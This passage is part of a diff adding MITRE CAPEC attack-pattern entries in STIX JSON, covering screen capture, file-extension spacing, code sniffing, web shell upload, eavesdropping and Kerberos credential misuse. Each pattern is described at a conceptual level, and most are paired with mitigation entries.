The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.", + "id": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e4ee62c-e443-4037-aa6a-3ddddcf93324", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", + "id": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e559a56f-da83-4f00-bf13-dda7f216f4e3", + "modified": 
"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", + "external_references": [ + { + "external_id": "CAPEC-649", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-46", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/46.html" + }, + { + "description": "Masquerading:Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + } + ], + "id": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Adding a Space to a File Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "File extensions should be checked to see if non-visible characters are being included.", + "id": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-649-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. 
Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", + "external_references": [ + { + "external_id": "CAPEC-65", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/65.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniff Application Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. 
The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..", + "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Set up a sniffer: The adversary sets up a sniffer in the path between the server and the client and watches the traffic.

  2. Techniques
    The adversary sets up a sniffer in the path between the server and the client.

Exploit

  1. [Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.

  2. Techniques
    adversary loads the sniffer to capture the application code bound during a dynamic update.
    The adversary proceeds to reverse engineer the captured code.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have the ability to place themself in the communication path between the client and server.", + "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.", + "The attacker must be able to employ a sniffer on the network without being detected." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to capture communications between the client being updated and the server providing the update.\n In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.\n " + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Encrypt all communication between the client and server.", + "id": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11fbd0b-3fdd-4f8c-b521-a759509f3c72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL, SSH, SCP.", + "id": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f45fd050-a931-464c-985d-2ee73ad18461", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", + "id": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817eac3b-7a9b-49f3-853d-f4f1190b3d05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. 
The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", + "external_references": [ + { + "external_id": "CAPEC-650", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-553", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/553.html" + }, + { + "description": "Server Software Component:Web Shell", + "external_id": "T1505.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/003" + } + ], + "id": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Upload a Web Shell to a Web Server", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The web server is susceptible to one of the various web application exploits that allows for uploading a shell file." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94978147-aaca-4748-8abc-5609dc8c0133", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by an allowlist.", + "id": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34439947-c6ff-46d0-a607-e7439be9d509", + "modified": 
"2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). 
Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", + "external_references": [ + { + "external_id": "CAPEC-651", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/651.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Eavesdropping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (The adversary gains unauthorized access to information.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67" + ], + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally." + ], + "x_capec_resources_required": [ + "For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", + "id": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1641c1d2-3516-4cc2-9d1f-2358c9d3f117", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. 
Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", + "id": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cba47b13-b50e-4cb8-8e76-8a25e15c68cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, physically disable the microphone on your machine if it is not needed.", + "id": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fead0ee-041f-4282-bc32-392a7b3aed13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.", + "external_references": [ + { + "external_id": "CAPEC-652", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/652.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "description": "Steal or Forge Kerberos Tickets", + "external_id": "T1558", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + 
"source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Kerberos Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]", + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Kerberos credentials: The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.

  2. Techniques
    An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.
    An adversary guesses the credentials to a weak Kerberos service account.
    An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.
    An adversary conducts a Kerberoasting attack.

Experiment

  1. Attempt Kerberos authentication: Try each Kerberos credential against various resources within the domain until the target grants access.

  2. Techniques
    Manually or automatically enter each Kerberos service account credential through the target's interface.
    Attempt a Pass the Ticket attack.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n Kerberos is the default authentication method for Windows domains and is also used across many operating systems. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the domain or access to any resources the service account is privileged to access, among other things. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f" + ], + "x_capec_prerequisites": [ + "The system/application leverages Kerberos authentication.", + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.", + "The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.", + "The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.", + "The targeted network allows for network sniffing attacks to succeed." + ], + "x_capec_resources_required": [ + "A valid Kerberos ticket or a known Kerberos service account credential." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Kerberos credential, leveraging it is trivial." 
